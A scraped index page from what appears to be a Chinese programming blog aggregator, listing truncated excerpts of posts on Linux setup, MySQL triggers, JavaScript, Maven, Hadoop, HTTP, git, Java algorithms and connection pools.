    一、CentOS系统访问 g.cn ,发现中文乱码。 于是用以前的方式:yum -y install fonts-chinese CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。       后来,终于找到以下方法可以解决,需要两个中文支持的包: fonts-chinese-3.02-12.
  • 触发器 baalwolf 触发器
    触发器(trigger):监视某种情况,并触发某种操作。 触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 语法: create trigger triggerName after/before 
  • JS正则表达式的i m g bijian1013 JavaScript正则表达式
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
  • HTML5模式和Hashbang模式 bijian1013 JavaScriptAngularJSHashbang模式HTML5模式
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 html5Mode         一个布尔值,标识$location服务是否运行在HTML5模式下。 ha
  • [Maven学习笔记六]Maven生命周期 bit1129 maven
    从mvn test的输出开始说起   当我们在user-core中执行mvn test时,执行的输出如下:   /software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错 bit1129 hadoop
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 Task Failure Application Master Failure Node Manager Failure Resource Manager Failure 1. Task Failure 任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
  • 记一次数据推送的异常解决端口解决 ronin47 记一次数据推送的异常解决
       需求:从db获取数据然后推送到B         程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。     自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。    service iptables stop
  • 巧用视错觉-UI更有趣 brotherlamp UIui视频ui教程ui自学ui资料
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线) bylijinnan 数据结构算法线段树
    package com.ljn.base; import java.util.Arrays; import java.util.Comparator; import java.util.Set; import java.util.TreeSet; /** * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177
  • HTTP协议详解 chicony http协议
    引言                                 
  • Scala设计模式 chenchao051 设计模式scala
    Scala设计模式                我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
  • 安装mysql daizj mysql安装
    安装mysql   (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除)      执行命令rpm -qa |grep mysql 检查是否删除干净   (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
  • HTTP状态码大全 dcj3sjt126com http状态码
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
  • asihttprequest上传图片 dcj3sjt126com ASIHTTPRequest
    NSURL *url =@"yourURL"; ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url]; [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
  • C语言中,关键字static的作用 e200702084 C++cC#
    在C语言中,关键字static有三个明显的作用: 1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
  • win7/8使用curl geeksun win7
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。 下载地址:  http://curl.haxx.se/download.html 请选择不带SSL的版本,否则还需要安装SSL的支持包   2.  可以给Windows增加c
  • Creating a Shared Repository; Users Sharing The Repository hongtoushizi git
    转载自:   http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/ Commands discussed in this section: git init –bare git clone git remote git pull git p
  • Java实现字符串反转的8种或9种方法 Josh_Persistence 异或反转递归反转二分交换反转java字符串反转栈反转
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: http://josh-persistence.iteye.com/blog/2205768   /** * */ package com.wsheng.aggregator.algorithm.string; import java.util.Stack; /**
  • 代码实现任意容量倒水问题 home198979 PHP算法倒水
    形象化设计模式实战             HELLO!架构                     redis命令源码解析   倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
  • Druid datasource zhb8015 druid
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
  • 两种启动监听器ApplicationListener和ServletContextListener spjich javaspring框架
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器   ServletContextListener  特点: 依赖于sevlet容器,需要配置web.xml 使用方法: public class StartListener implements
  • JavaScript Rounding Methods of the Math object 何不笑 JavaScriptMath
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他